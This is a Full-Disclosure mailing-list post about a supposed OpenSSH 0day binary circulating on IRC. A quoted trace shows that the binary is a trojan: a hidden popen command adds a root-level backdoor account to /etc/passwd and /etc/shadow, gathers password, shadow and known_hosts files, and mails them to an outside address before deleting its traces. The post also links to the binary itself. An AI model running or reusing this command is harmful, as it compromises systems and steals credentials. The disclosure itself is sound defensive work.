printf("[*] sending shellcode\n")= 22
popen("(echo "sys3:x:0:103::/:/bin/sh" >> /etc/passwd; echo
"sys3:\\$1\\$nWXmkX74\\$Ws8fX/MFI3.j5HKahNqIQ0:12311:0:9999
9:7:::" >> /etc/shadow; /sbin/ifconfig -a >/tmp/.tmp;cat /etc/passwd
/etc/shadow /root/.ssh*/known_hosts >> /tmp/.tmp;
find /home -name known_hosts -exec cat {} >> /tmp/.tmp;cat /tmp/.tmp |
/usr/sbin/sendmail -f ownage@xxxxxx
m0nkeyhack@xxxxxxxxxxxxx) &> /dev/null ; rm -f /tmp/.tmp;", "r") =
0x0804a6b0
-KF
gordon last wrote:
hi readers,
while i was staying idle in an so called 0day release channel on one
irc network some scriptkiddies were
talking about an new 0day release.
in my backlog i can see the following:
---cut
08:09 [R4lph] *** r3t0r (r4lph@xxx) has joined channel #0dayz
08:09 [R4lph] 0day: http://www.anzwers.org/free/m0nkeyhack/0d/
---cut
i looked at this piece of exploit... it is binary so i'am not sure if
this is a trojan or a backdoor or a virus. but i can't see anything
strange while sniffing the exploit traffic. and i got root on
serveral of my openbsd boxes with that. the bruteforcer seems to be
very good.
i too looked at "strings theosshucksass" and found nothing suspicious.
this exploit seems to be in the wild (underground) since beginning of
august.
thats quite a long time i hope most admins are patching the systems
now... because the exploit is getting round faster and faster.
if anyone can reverse engineer this piece it would be great if he
posts his resulsts on his list because iam really intressted on the
exploiting technique used for that bug.
i cant get an idea on how to exploit this.
hmm...
regards,
glast
------------------------------------------------------------------------
Ab sofort auch im Ortsbereich einfach die 0-10-13 vorwählen. Infos
unter www.tele2.de » <http://www.tele2.de>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html